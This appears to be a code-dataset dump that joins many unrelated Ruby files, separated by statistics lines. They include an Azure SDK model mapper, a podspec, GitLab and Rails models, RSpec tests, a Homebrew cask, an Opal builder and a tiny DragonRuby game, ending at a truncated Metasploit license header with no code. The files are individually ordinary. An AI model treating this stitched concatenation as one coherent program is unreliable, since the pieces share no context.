# @return [DateTime] The creation date of the gallery image.
attr_accessor :created_date
# @return [String] The description of the gallery image.
attr_accessor :description
# @return [GalleryImageReference] The image reference of the gallery
# image.
attr_accessor :image_reference
# @return [String] The icon of the gallery image.
attr_accessor :icon
# @return [Boolean] Indicates whether this gallery image is enabled.
attr_accessor :is_enabled
# @return [Boolean] Indicates whether this gallery has been overridden
# for this lab account
attr_accessor :is_override
# @return [String] The third party plan that applies to this image
attr_accessor :plan_id
# @return [Boolean] Indicates if the plan has been authorized for
# programmatic deployment.
attr_accessor :is_plan_authorized
# @return [String] The provisioning status of the resource.
attr_accessor :provisioning_state
# @return [String] The unique immutable identifier of a resource (Guid).
attr_accessor :unique_identifier
# @return [LatestOperationResult] The details of the latest operation.
# ex: status, error
attr_accessor :latest_operation_result
#
# Mapper for GalleryImage class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'GalleryImage',
type: {
name: 'Composite',
class_name: 'GalleryImage',
model_properties: {
id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'id',
type: {
name: 'String'
}
},
name: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'name',
type: {
name: 'String'
}
},
type: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'type',
type: {
name: 'String'
}
},
location: {
client_side_validation: true,
required: false,
serialized_name: 'location',
type: {
name: 'String'
}
},
tags: {
client_side_validation: true,
required: false,
serialized_name: 'tags',
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
author: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.author',
type: {
name: 'String'
}
},
created_date: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.createdDate',
type: {
name: 'DateTime'
}
},
description: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.description',
type: {
name: 'String'
}
},
image_reference: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.imageReference',
type: {
name: 'Composite',
class_name: 'GalleryImageReference'
}
},
icon: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.icon',
type: {
name: 'String'
}
},
is_enabled: {
client_side_validation: true,
required: false,
serialized_name: 'properties.isEnabled',
type: {
name: 'Boolean'
}
},
is_override: {
client_side_validation: true,
required: false,
serialized_name: 'properties.isOverride',
type: {
name: 'Boolean'
}
},
plan_id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.planId',
type: {
name: 'String'
}
},
is_plan_authorized: {
client_side_validation: true,
required: false,
serialized_name: 'properties.isPlanAuthorized',
type: {
name: 'Boolean'
}
},
provisioning_state: {
client_side_validation: true,
required: false,
serialized_name: 'properties.provisioningState',
type: {
name: 'String'
}
},
unique_identifier: {
client_side_validation: true,
required: false,
serialized_name: 'properties.uniqueIdentifier',
type: {
name: 'String'
}
},
latest_operation_result: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'properties.latestOperationResult',
type: {
name: 'Composite',
class_name: 'LatestOperationResult'
}
}
}
}
}
end
end
end
end
| 31.251082 | 78 | 0.462252 |
f81ba52b7ea4660c73380e5bdaf5aa386c376c1f | 26 | module FixturesHelper
end
| 8.666667 | 21 | 0.884615 |
f891346853bb82b570daf1e8481a3a97b378d758 | 565 | Pod::Spec.new do |s|
s.name = 'NanoStore'
s.version = '2.5.3'
s.license = 'BSD'
s.summary = 'NanoStore is an open source, lightweight schema-less local key-value document store written in Objective-C for Mac OS X and iOS.'
s.homepage = 'https://github.com/tciuro/NanoStore'
s.authors = { 'Tito Ciuro' => '[email protected]' }
s.source = { :git => 'https://github.com/tciuro/NanoStore.git', :tag => '2.5.3' }
s.source_files = 'Classes/**/*.{h,m}'
s.library = 'sqlite3'
s.requires_arc = true
end
| 40.357143 | 150 | 0.589381 |
03eb7462ece037c95983a47d363881ec8df1e287 | 887 | # frozen_string_literal: true
class AuditEvent < ApplicationRecord
include CreatedAtFilterable
serialize :details, Hash # rubocop:disable Cop/ActiveRecordSerialize
belongs_to :user, foreign_key: :author_id
validates :author_id, presence: true
validates :entity_id, presence: true
validates :entity_type, presence: true
scope :by_entity_type, -> (entity_type) { where(entity_type: entity_type) }
scope :by_entity_id, -> (entity_id) { where(entity_id: entity_id) }
scope :order_by_id_desc, -> { order(id: :desc) }
scope :order_by_id_asc, -> { order(id: :asc) }
after_initialize :initialize_details
def initialize_details
self.details = {} if details.nil?
end
def author_name
self.user.name
end
def formatted_details
details.merge(details.slice(:from, :to).transform_values(&:to_s))
end
end
AuditEvent.prepend_if_ee('EE::AuditEvent')
| 25.342857 | 77 | 0.739572 |
1ad14f2f569d91295031d2f4e73aef0020037bf8 | 360 | cask "font-amstelvar-alpha" do
version :latest
sha256 :no_check
# github.com/google/fonts/ was verified as official when first introduced to the cask
url "https://github.com/google/fonts/raw/master/ofl/amstelvaralpha/AmstelvarAlpha-VF.ttf"
name "Amstelvar Alpha"
homepage "https://fonts.google.com/earlyaccess"
font "AmstelvarAlpha-VF.ttf"
end
| 30 | 91 | 0.763889 |
f866bc29e693f7205b85e86701194e8944e729ff | 1,340 | require 'rails_helper'
RSpec.describe User, type: :model do
describe 'Validations' do
it do
should validate_presence_of(:username)
.with_message('Username cannot be blank')
end
it do
should validate_length_of(:username)
.is_at_most(10)
.with_message('Maximum allowed username is 10 characters.')
end
it { should_not validate_length_of(:username).is_at_least(2) }
it { should_not validate_length_of(:username).is_at_most(11) }
it { should validate_uniqueness_of(:username).case_insensitive.with_message('Username already taken.') }
it do
should validate_presence_of(:fullname)
.with_message('FullName cannot be blank')
end
it do
should validate_length_of(:fullname)
.is_at_most(20)
.with_message('Maximum allowed fullname is 20 characters.')
end
it do
should_not validate_length_of(:fullname)
.is_at_least(5)
.with_message('Minimum allowed characters for fullname is 6')
end
end
describe 'Associations' do
it { should have_many(:opinions).with_foreign_key(:author_id) }
it { should have_many(:followings).with_foreign_key(:follower_id) }
it { should have_many(:follows).through(:followings) }
it { should have_many(:followers).through(:inverse_followings) }
end
end
| 31.162791 | 108 | 0.695522 |
e974dc519d69ca552fd6b2bafa223331252efb86 | 1,658 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Gitlab::Redis::TraceChunks do
let(:instance_specific_config_file) { "config/redis.trace_chunks.yml" }
let(:environment_config_file_name) { "GITLAB_REDIS_TRACE_CHUNKS_CONFIG_FILE" }
let(:shared_state_config_file) { nil }
before do
allow(Gitlab::Redis::SharedState).to receive(:config_file_name).and_return(shared_state_config_file)
end
include_examples "redis_shared_examples"
describe '.config_file_name' do
subject { described_class.config_file_name }
let(:rails_root) { Dir.mktmpdir('redis_shared_examples') }
before do
# Undo top-level stub of config_file_name because we are testing that method now.
allow(described_class).to receive(:config_file_name).and_call_original
allow(described_class).to receive(:rails_root).and_return(rails_root)
FileUtils.mkdir_p(File.join(rails_root, 'config'))
end
after do
FileUtils.rm_rf(rails_root)
end
context 'when there is only a resque.yml' do
before do
FileUtils.touch(File.join(rails_root, 'config/resque.yml'))
end
it { expect(subject).to eq("#{rails_root}/config/resque.yml") }
context 'and there is a global env override' do
before do
stub_env('GITLAB_REDIS_CONFIG_FILE', 'global override')
end
it { expect(subject).to eq('global override') }
context 'and SharedState has a different config file' do
let(:shared_state_config_file) { 'shared state config file' }
it { expect(subject).to eq('shared state config file') }
end
end
end
end
end
| 29.607143 | 104 | 0.701448 |
bf5b392fa1cc8058f1d752851eac06e0539d2bf4 | 753 | # frozen_string_literal: true
require "test_helper"
class ReplyToComponentTest < ViewComponent::TestCase
setup do
@topic = create(:topic)
@reply_to = create(:reply, topic: @topic)
@reply = create(:reply, reply_to: @reply_to, topic: @topic)
end
test "normal" do
component = ReplyToComponent.new(reply: @reply, topic: @topic)
doc = render_inline(component)
assert_equal 0, doc.css(".markdown").length
end
test "show body" do
component = ReplyToComponent.new(reply: @reply, topic: @topic, show_body: true)
doc = render_inline(component)
assert_equal 1, doc.css(".markdown").length
end
test "nil" do
assert_equal "", render_inline(ReplyToComponent.new(reply: nil, topic: @topic)).to_html
end
end
| 26.892857 | 91 | 0.699867 |
33bf1372adc2bd616af6ced283051516a092af7e | 942 | module EventStore
module EntityStore
module Controls
module Entity
def self.example
Current.example
end
class Example
include Schema::DataStructure
attribute :sum
def ==(other)
other.is_a?(self.class) && other.sum == sum
end
end
module Cached
def self.example
Example.build :sum => sum
end
def self.add(store, id)
entity = self.example
version = Version::Cached.example
store.cache.add id, entity, version, persisted_version: version
return entity, version
end
def self.sum
1
end
end
module Current
def self.example
Example.build :sum => sum
end
def self.sum
12
end
end
end
end
end
end
| 18.470588 | 75 | 0.488323 |
f86eeafd6b6af5ffc0fd28c0b9b157d979c81e28 | 1,117 | Gem::Specification.new do |s|
s.name = 'cached_record'
s.version = '0.0.1'
s.date = '2008-10-27'
s.summary = "memcached caching for active record"
#s.description = ""
s.authors = ['Kacper Cieśla']
s.email = '[email protected]'
s.homepage = ''
s.has_rdoc = true
s.rdoc_options = ['--main', 'README.txt']
s.rdoc_options << '--inline-source' << '--charset=UTF-8'
s.extra_rdoc_files = ['README.txt']
s.test_files = %w{test/migrations test/migrations/create_notes.rb test/migrations/create_users.rb test/models test/models/note.rb test/models/original_user.rb test/models/original_note.rb test/models/user.rb test/test_cached_record.rb test/fixtures test/fixtures/users.yml test/cases test/cases/hello.rb test/environment.rb}
s.files = %w{tasks tasks/bones.rake tasks/spec.rake tasks/notes.rake tasks/rubyforge.rake tasks/test.rake tasks/git.rake tasks/post_load.rake tasks/setup.rb tasks/svn.rake tasks/gem.rake tasks/ann.rake tasks/rdoc.rake tasks/manifest.rake Manifest.txt lib lib/cached_record lib/cached_record/base.rb lib/cached_record.rb Rakefile README.txt History.txt}
end
| 53.190476 | 355 | 0.747538 |
f72b7716b26797db89e786bd818b2bfcf934e064 | 1,103 | # spark_restart - Restart the Spark components
#
# This recipe restarts Spark on the server. It will start the
# appropriate services, depending on whether this is a designated
# Spark master.
Chef::Log.info("Running #{node['app_name']}::spark_restart")
require File.expand_path("../spark_helper.rb", __FILE__)
# Assume that this is a Spark master unless dependent configurations are found
sparkInfo = get_spark_info()
is_spark_master = sparkInfo[:is_spark_master]
is_client_only = sparkInfo[:is_client_only]
configNode = sparkInfo[:config_node]
# Restart the Spark service
service "spark" do
action [ :restart ]
only_if { !is_client_only }
end
# Start the Spark Thrift Server service
service "spark-thriftserver" do
action [ :restart ]
only_if { is_client_only && configNode.has_key?('enable_thriftserver') && configNode['enable_thriftserver'] == 'true' }
end
# Start the Spark History Server service
service "spark-historyserver" do
action [ :restart ]
only_if { is_client_only && configNode.has_key?('enable_historyserver') && configNode['enable_historyserver'] == 'true' }
end
| 32.441176 | 123 | 0.75884 |
91ea1756c4396a854e24bfab0388b67446171485 | 4,558 |
module ActiveRecord
module Batches
# Looping through a collection of records from the database
# (using the +all+ method, for example) is very inefficient
# since it will try to instantiate all the objects at once.
#
# In that case, batch processing methods allow you to work
# with the records in batches, thereby greatly reducing memory consumption.
#
# The #find_each method uses #find_in_batches with a batch size of 1000 (or as
# specified by the +:batch_size+ option).
#
# Person.find_each do |person|
# person.do_awesome_stuff
# end
#
# Person.where("age > 21").find_each do |person|
# person.party_all_night!
# end
#
# If you do not provide a block to #find_each, it will return an Enumerator
# for chaining with other methods:
#
# Person.find_each.with_index do |person, index|
# person.award_trophy(index + 1)
# end
#
# ==== Options
# * <tt>:batch_size</tt> - Specifies the size of the batch. Default to 1000.
# * <tt>:start</tt> - Specifies the starting point for the batch processing.
# This is especially useful if you want multiple workers dealing with
# the same processing queue. You can make worker 1 handle all the records
# between id 0 and 10,000 and worker 2 handle from 10,000 and beyond
# (by setting the +:start+ option on that worker).
#
# # Let's process for a batch of 2000 records, skiping the first 2000 rows
# Person.find_each(start: 2000, batch_size: 2000) do |person|
# person.party_all_night!
# end
#
# NOTE: It's not possible to set the order. That is automatically set to
# ascending on the primary key ("id ASC") to make the batch ordering
# work. This also means that this method only works with integer-based
# primary keys.
#
# NOTE: You can't set the limit either, that's used to control
# the batch sizes.
def find_each(options = {})
if block_given?
find_in_batches(options) do |records|
records.each { |record| yield record }
end
else
enum_for :find_each, options
end
end
# Yields each batch of records that was found by the find +options+ as
# an array.
#
# Person.where("age > 21").find_in_batches do |group|
# sleep(50) # Make sure it doesn't get too crowded in there!
# group.each { |person| person.party_all_night! }
# end
#
# ==== Options
# * <tt>:batch_size</tt> - Specifies the size of the batch. Default to 1000.
# * <tt>:start</tt> - Specifies the starting point for the batch processing.
# This is especially useful if you want multiple workers dealing with
# the same processing queue. You can make worker 1 handle all the records
# between id 0 and 10,000 and worker 2 handle from 10,000 and beyond
# (by setting the +:start+ option on that worker).
#
# # Let's process the next 2000 records
# Person.find_in_batches(start: 2000, batch_size: 2000) do |group|
# group.each { |person| person.party_all_night! }
# end
#
# NOTE: It's not possible to set the order. That is automatically set to
# ascending on the primary key ("id ASC") to make the batch ordering
# work. This also means that this method only works with integer-based
# primary keys.
#
# NOTE: You can't set the limit either, that's used to control
# the batch sizes.
def find_in_batches(options = {})
options.assert_valid_keys(:start, :batch_size)
relation = self
unless arel.orders.blank? && arel.taken.blank?
ActiveRecord::Base.logger.warn("Scoped order and limit are ignored, it's forced to be batch order and batch size")
end
start = options.delete(:start)
batch_size = options.delete(:batch_size) || 1000
relation = relation.reorder(batch_order).limit(batch_size)
records = start ? relation.where(table[primary_key].gteq(start)).to_a : relation.to_a
while records.any?
records_size = records.size
primary_key_offset = records.last.id
yield records
break if records_size < batch_size
if primary_key_offset
records = relation.where(table[primary_key].gt(primary_key_offset)).to_a
else
raise "Primary key not included in the custom select clause"
end
end
end
private
def batch_order
"#{quoted_table_name}.#{quoted_primary_key} ASC"
end
end
end
| 36.464 | 122 | 0.652699 |
bb9511a33713f1fd7b545cfd79201a453e723fc4 | 248 | class ErrorMessage < ActiveRecord::Base
belongs_to :user
validates :message, :fix, :image, presence: true
has_attached_file :image, styles: { :medium => "400x400#" }
validates_attachment_content_type :image, content_type: /\Aimage\/.*\Z/
end
| 27.555556 | 72 | 0.741935 |
3977b137f7766e0242dd7bbf8896f4c90fa3f1e9 | 6,836 | # frozen_string_literal: true
require File.expand_path(File.dirname(__FILE__) + '/../rails_helper')
require File.expand_path(File.dirname(__FILE__) + '/../arp_spec_helper')
describe AccountsController do
before(:context) do
@user = create_user!
end
describe AccountsController, 'during account creation' do
it 'should not allow periods in login name' do
post :create, params: { account: { login: 'foobar.baz', password: 'barbarbar',
password_confirmation: 'barbarbar',
email: '[email protected]' } }
expect(assigns(:account)).to_not be_valid
expect(response).to render_template('new')
end
end
describe AccountsController, 'when logging in' do
it 'should remember the requested location in a non-logged-in state and redirect.' do
request.session[:return_to] = 'http://www.google.com'
post :login_attempt, params: { account: { login: @user.login, password: 'mysecret' } }
expect(response).to redirect_to('http://www.google.com')
end
it 'should redirect to dashboard if already logged in' do
login_as_user!
get :login
expect(response).to redirect_to(dashboard_path)
end
end
end
describe AccountsController do
before(:context) do
@user = create_user!
end
describe 'Edit account' do
before do
login!(@user.login, 'mysecret')
end
it 'should respond with success' do
get :edit, params: { id: @user.id }
expect(@response).to be_successful
end
it 'should get account info from current logged in user' do
get :edit, params: { id: @user.id }
expect(assigns(:account)).to eq @user
end
it 'should not get account info from another user' do
@other = create(:account_user, login: 'other')
get :edit, params: { id: @other.id }
expect(assigns(:account)).to_not eq @other
end
end
describe 'Show account' do
it 'should redirect to edit' do
@user = login_as_user!
get :show, params: { id: @user.id }
expect(@response).to redirect_to(edit_account_path(@user))
end
end
describe 'Forgot password' do
it 'should not require login' do
get :forgot_password
expect(@response).to be_successful
expect(@response).to render_template('forgot_password')
end
end
describe 'Provisioning Actions' do
before do
@account = login_as_user!
end
def do_get_ip_address_inventory
get :ip_address_inventory, params: { location: @location, format: :json }
end
context 'with valid location' do
before do
@location = 'lax'
@location_obj = Location.new(code: @location)
allow(Location).to receive(:find_by).with(code: @location)\
.and_return(@location_obj)
end
context 'with IPs in use' do
before do
@ips_in_use = ['10.0.0.2', '10.0.0.3']
allow(@account).to receive(:ips_in_use).and_return(@ips_in_use)
end
it 'should mark them in use' do
do_get_ip_address_inventory
expect(@response).to be_successful
json_response = JSON.parse(@response.body)
ips = json_response['ips']
expect(ips.size).to eq @ips_in_use.size
@ips_in_use.each do |available_ip|
expect(ips[available_ip]).not_to be_nil
expect(ips[available_ip]['assigned']).to be true
end
end
it 'should have further assignment information' do
do_get_ip_address_inventory
expect(@response).to be_successful
json_response = JSON.parse(@response.body)
ips = json_response['ips']
expect(ips.size).to eq @ips_in_use.size
@ips_in_use.each do |available_ip|
expect(ips[available_ip]).not_to be_nil
expect(ips[available_ip]['assignment']).not_to be_nil
expect(ips[available_ip]['assignment']).not_to be_empty
end
end
end
context 'with IPs available' do
before do
@ips_available = ['10.0.0.4', '10.0.0.5', '10.0.0.6']
allow(@account).to receive(:ips_available)\
.with(location: @location_obj).and_return(@ips_available)
end
it 'should set caption for location' do
do_get_ip_address_inventory
expect(@response).to be_successful
json_response = JSON.parse(@response.body)
caption = json_response['caption']
expect(caption).to match(/Please Choose/)
end
it 'should include IP address in hash' do
do_get_ip_address_inventory
expect(@response).to be_successful
json_response = JSON.parse(@response.body)
ips = json_response['ips']
expect(ips.size).to eq @ips_available.size
@ips_available.each do |available_ip|
expect(ips[available_ip]).not_to be_nil
expect(ips[available_ip]['ip_address']).to eq available_ip
end
end
it 'should mark them available' do
do_get_ip_address_inventory
expect(@response).to be_successful
json_response = JSON.parse(@response.body)
ips = json_response['ips']
expect(ips.size).to eq @ips_available.size
@ips_available.each do |available_ip|
expect(ips[available_ip]).not_to be_nil
expect(ips[available_ip]['assigned']).to be false
end
end
it 'should be assigned to the correct location' do
do_get_ip_address_inventory
expect(@response).to be_successful
json_response = JSON.parse(@response.body)
ips = json_response['ips']
expect(ips.size).to eq @ips_available.size
@ips_available.each do |available_ip|
expect(ips[available_ip]).not_to be_nil
expect(ips[available_ip]['location']).to eq @location
end
end
it 'should not have any further assignment information' do
do_get_ip_address_inventory
expect(@response).to be_successful
json_response = JSON.parse(@response.body)
ips = json_response['ips']
expect(ips.size).to eq @ips_available.size
@ips_available.each do |available_ip|
expect(ips[available_ip]).not_to be_nil
expect(ips[available_ip]['assignment']).to be_nil
end
end
end
end
context 'with invalid location' do
before do
@location = 'ams'
end
it 'should return empty set' do
do_get_ip_address_inventory
expect(@response).to_not be_successful
expect(@response.body).to include('No such location')
end
end
end
end
| 30.792793 | 92 | 0.619661 |
9192890bb9e3aad937b5432728f3785d29aa59af | 3,199 | require File.expand_path(File.dirname(__FILE__) + "/../test_helper")
class PageArticlesRoutesTest < ActionController::TestCase
tests ArticlesController
with_common :a_page, :an_article
paths = %W( /pages/1
/pages/1/comments.atom
/pages/1/articles/an-article
/pages/1/articles/an-article.atom )
paths.each do |path|
test "regenerates the original path from the recognized params for #{path}" do
without_routing_filters do
params = ActionController::Routing::Routes.recognize_path(path, :method => :get)
assert_equal path, @controller.url_for(params.merge(:only_path => true))
end
end
end
describe "routing" do
['', '/a-page', '/de', '/de/a-page'].each do |path_prefix|
['', '/pages/2'].each do |path_suffix|
common = { :section_id => Section.first.id.to_s, :path_prefix => path_prefix, :path_suffix => path_suffix }
common.merge! :locale => 'de' if path_prefix =~ /de/
common.merge! :page => 2 if path_suffix =~ /pages/
with_options common do |r|
r.it_maps :get, '/', :action => 'index'
r.it_maps :get, '/articles/an-article', :action => 'show', :permalink => 'an-article'
unless path_suffix =~ /pages/
r.it_maps :get, '/articles/an-article.atom', :action => 'comments', :permalink => 'an-article', :format => 'atom'
end
end
end
end
# these do not work with a root page path because there's a reguar Comments resource
with_options :action => 'comments', :format => 'atom', :section_id => Section.first.id.to_s do |r|
r.it_maps :get, '/a-page/comments.atom'
r.it_maps :get, '/de/a-page/comments.atom', :locale => 'de'
end
end
describe "the url_helper page_path" do
before :each do
# FIXME move to db/populate?
other = @section.site.sections.create! :title => 'another page'
other.move_to_left_of @section
url_rewriter = ActionController::UrlRewriter.new @request, :controller => 'pages', :page => @section.id
@controller.instance_variable_set :@url, url_rewriter
@controller.instance_variable_set :@site, @site
I18n.default_locale = :en
I18n.locale = :de
end
page_path = lambda { page_path(@section) }
article_path = lambda { page_article_path(@section, 'an-article') }
it_rewrites page_path, :to => '/', :with => [:is_default_locale, :is_root_section]
it_rewrites page_path, :to => '/a-page', :with => [:is_default_locale]
it_rewrites page_path, :to => '/de', :with => [:is_root_section]
it_rewrites page_path, :to => '/de/a-page'
it_rewrites article_path, :to => '/articles/an-article', :with => [:is_default_locale, :is_root_section]
it_rewrites article_path, :to => '/a-page/articles/an-article', :with => [:is_default_locale]
it_rewrites article_path, :to => '/de/articles/an-article', :with => [:is_root_section]
it_rewrites article_path, :to => '/de/a-page/articles/an-article'
end
end | 43.821918 | 125 | 0.610191 |
ac1ee50e331bb76bf050e281ff20ad3f93d0aa35 | 922 | cask "hstracker" do
version "1.7.8"
sha256 "152b199825c7049435a51421d0871507cfa30507316db37aa31c2be1639e427a"
url "https://github.com/HearthSim/HSTracker/releases/download/#{version}/HSTracker.app.zip",
verified: "github.com/HearthSim/HSTracker/"
appcast "https://github.com/HearthSim/HSTracker/releases.atom"
name "Hearthstone Deck Tracker"
desc "Deck tracker and deck manager for Hearthstone"
homepage "https://hsdecktracker.net/"
app "HSTracker.app"
zap trash: [
"~/Library/Application Support/HSTracker",
"~/Library/Application Support/net.hearthsim.hstracker",
"~/Library/Caches/HSTracker",
"~/Library/Caches/net.hearthsim.hstracker",
"~/Library/Cookies/net.hearthsim.hstracker.binarycookies*",
"~/Library/Logs/HSTracker",
"~/Library/Preferences/net.hearthsim.hstracker.plist",
"~/Library/Saved Application State/net.hearthsim.hstracker.savedState",
]
end
| 36.88 | 94 | 0.74295 |
4ad75e8b7aa0c4f20a5bed3ed21103dc06b5033b | 1,060 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# This file is the source Rails uses to define your schema when running `bin/rails
# db:schema:load`. When creating a new database, `bin/rails db:schema:load` tends to
# be faster and is potentially less error prone than running all of your
# migrations from scratch. Old migrations may fail to apply correctly if those
# migrations use external dependencies or application code.
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2021_06_19_215423) do
create_table "cars", force: :cascade do |t|
t.string "title"
t.string "image_url"
t.string "description"
t.string "condition"
t.string "available"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
end
| 40.769231 | 86 | 0.757547 |
6abb75641a5edf7e21cef05e88026361d392e3b5 | 1,422 | require File.dirname(__FILE__) + '/../test_helper'
require 'document_controller'
# Re-raise errors caught by the controller.
class DocumentController; def rescue_action(e) raise e end; end
class DocumentControllerTest < ActionController::TestCase
fixtures :documents
def setup
@controller = DocumentController.new
@request = ActionController::TestRequest.new
@response = ActionController::TestResponse.new
end
def test_routing
print "XXXX Testing Document Routing"
with_options :controller => 'document', :action => 'show' do |r|
r.assert_routing "/document/this%20is%20a%20good%20idea", :name => 'this is a good idea'
r.assert_routing "/document/this%20is%20a%20good%20idea%20for%20talks.cam", :name => 'this is a good idea for talks.cam'
# Can't find where this modification is supposed to happen, so removed the +s from the test for the time being
#r.assert_routing "/document/this+is+a+good+idea", :name => 'this is a good idea'
#r.assert_routing "/document/this+is+a+good+idea+for+talks.cam", :name => 'this is a good idea for talks.cam'
end
end
def test_index_sorts_alphabetically
get :index
assert_response :success
index = assigns(:documents)
assert_kind_of Array, index
assert_equal 2, index.size
assert_equal documents(:first), index.first
assert_equal documents(:second), index.last
end
end
| 36.461538 | 126 | 0.71519 |
870ccfa576e19d26ecc211f39cb001b8a193926a | 1,793 | module MRuby
module LoadGems
def gembox(gemboxfile)
gembox = File.expand_path("#{gemboxfile}.gembox", "#{MRUBY_ROOT}/mrbgems")
fail "Can't find gembox '#{gembox}'" unless File.exists?(gembox)
GemBox.config = self
instance_eval File.read(gembox)
end
def gem(gemdir, &block)
caller_dir = File.expand_path(File.dirname(/^(.*?):\d/.match(caller.first).to_a[1]))
if gemdir.is_a?(Hash)
gemdir = load_special_path_gem(gemdir)
else
gemdir = File.expand_path(gemdir, caller_dir)
end
gemrake = File.join(gemdir, "mrbgem.rake")
fail "Can't find #{gemrake}" unless File.exists?(gemrake)
Gem.current = nil
load gemrake
return nil unless Gem.current
Gem.current.dir = gemdir
Gem.current.build = MRuby::Build.current
Gem.current.build_config_initializer = block
gems << Gem.current
Gem.current
end
def load_special_path_gem(params)
if params[:github]
params[:git] = "https://github.com/#{params[:github]}.git"
elsif params[:bitbucket]
params[:git] = "https://bitbucket.org/#{params[:bitbucket]}.git"
end
if params[:core]
gemdir = "#{root}/mrbgems/#{params[:core]}"
elsif params[:git]
url = params[:git]
gemdir = "build/mrbgems/#{url.match(/([-\w]+)(\.[-\w]+|)$/).to_a[1]}"
return gemdir if File.exists?(gemdir)
options = [params[:options]] || []
options << "--branch \"#{params[:branch]}\"" if params[:branch]
FileUtils.mkdir_p "build/mrbgems"
git.run_clone gemdir, url, options
else
fail "unknown gem option #{params}"
end
gemdir
end
def enable_gems?
[email protected]?
end
end # LoadGems
end # MRuby
| 28.919355 | 90 | 0.600112 |
bb8f88398f2da01fbc9061311999c0d286ff2c9b | 4,563 | require 'opal/path_reader'
require 'opal/builder_processors'
require 'opal/paths'
require 'set'
module Opal
class Builder
include BuilderProcessors
class MissingRequire < LoadError
end
def initialize(options = nil)
(options || {}).each_pair do |k,v|
public_send("#{k}=", v)
end
@stubs ||= []
@preload ||= []
@processors ||= DEFAULT_PROCESSORS
@path_reader ||= PathReader.new
@prerequired ||= []
@compiler_options ||= {}
@default_processor ||= RubyProcessor
@processed = []
end
def self.build(*args, &block)
new.build(*args, &block)
end
def build(path, options = {})
source = read(path)
build_str(source, path, options)
end
def build_str source, filename, options = {}
path = path_reader.expand(filename).to_s unless stub?(filename)
asset = processor_for(source, filename, path, options)
requires = preload + asset.requires + tree_requires(asset, path)
requires.map { |r| process_require(r, options) }
processed << asset
self
rescue MissingRequire => error
raise error, "A file required by #{filename.inspect} wasn't found.\n#{error.message}", error.backtrace
end
def build_require(path, options = {})
process_require(path, options)
end
def initialize_copy(other)
super
@stubs = other.stubs.dup
@preload = other.preload.dup
@processors = other.processors.dup
@path_reader = other.path_reader.dup
@prerequired = other.prerequired.dup
@compiler_options = other.compiler_options.dup
@processed = other.processed.dup
end
def to_s
processed.map(&:to_s).join("\n")
end
def source_map
processed.map(&:source_map).reduce(:+).as_json.to_json
end
def append_paths(*paths)
path_reader.append_paths(*paths)
end
include UseGem
attr_reader :processed
attr_accessor :processors, :default_processor, :path_reader,
:compiler_options, :stubs, :prerequired, :preload
private
def tree_requires(asset, path)
if path.nil? or path.empty?
dirname = Dir.pwd
else
dirname = File.dirname(File.expand_path(path))
end
paths = path_reader.paths.map{|p| File.expand_path(p)}
asset.required_trees.flat_map do |tree|
expanded = File.expand_path(tree, dirname)
base = paths.find { |p| expanded.start_with?(p) }
next [] if base.nil?
globs = extensions.map { |ext| File.join base, tree, '**', "*.#{ext}" }
Dir[*globs].map do |file|
Pathname(file).relative_path_from(Pathname(base)).to_s.gsub(/(\.js)?(\.(?:#{extensions.join '|'}))#{REGEXP_END}/, '')
end
end
end
def processor_for(source, filename, path, options)
processor = processors.find { |p| p.match? path }
processor ||= default_processor
return processor.new(source, filename, compiler_options.merge(options))
end
def read(path)
path_reader.read(path) or
raise MissingRequire, "can't find file: #{path.inspect} in #{path_reader.paths.inspect}"
end
def process_require(filename, options)
filename.gsub!(/\.(rb|js|opal)#{REGEXP_END}/, '')
return if prerequired.include?(filename)
return if already_processed.include?(filename)
already_processed << filename
source = stub?(filename) ? '' : read(filename)
if source.nil?
message = "can't find file: #{filename.inspect}"
case @compiler_options[:dynamic_require_severity]
when :error then raise LoadError, message
when :warning then warn "can't find file: #{filename.inspect}"
end
end
path = path_reader.expand(filename).to_s unless stub?(filename)
asset = processor_for(source, filename, path, options.merge(requirable: true))
process_requires(filename, asset.requires+tree_requires(asset, path), options)
processed << asset
end
def process_requires(filename, requires, options)
requires.map { |r| process_require(r, options) }
rescue MissingRequire => error
raise error, "A file required by #{filename.inspect} wasn't found.\n#{error.message}"
end
def already_processed
@already_processed ||= Set.new
end
def stub? filename
stubs.include?(filename)
end
def extensions
@extensions ||= DEFAULT_PROCESSORS.flat_map(&:extensions).compact
end
end
end
| 28.166667 | 127 | 0.633136 |
283fb834930631c95a062576a7c4de095fecf13b | 1,102 | def get_randomness(args)
args.state.upper_height ||= rand(310)
args.state.lower_height ||= 720 - args.state.upper_height
end
def jump(args)
args.state.player_accel = 10
end
def gravity(args)
args.state.player_accel = args.state.player_accel - args.state.gravity_coeff
end
def move_player(args)
args.state.player_y += args.state.player_accel
end
def generate_pipes(args)
args.outputs.solids << [1000, 0, 100, args.state.upper_height]
args.outputs.solids << [1000, args.state.lower_height, 100, 730]
end
def tick(args)
args.outputs.labels << [100, 100, args.state.player_accel]
args.state.player_x ||= 100
args.state.player_y ||= 360
args.state.player_accel ||= 0
args.state.gravity_coeff ||= 0.5
args.state.player = [
args.state.player_x, # X
args.state.player_y, # Y
64, # WIDTH
64, # HEIGHT
'sprites/circle-violet.png'
]
get_randomness(args)
generate_pipes(args)
jump(args) if args.inputs.keyboard.key_down.a
gravity(args)
move_player(args)
args.outputs.background_color = [50, 130, 190]
args.outputs.sprites << args.state.player
end
| 25.045455 | 78 | 0.717786 |
611dd437adc1c7d6ce0080bfa4e1a31be36d3364 | 3,735 | ##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
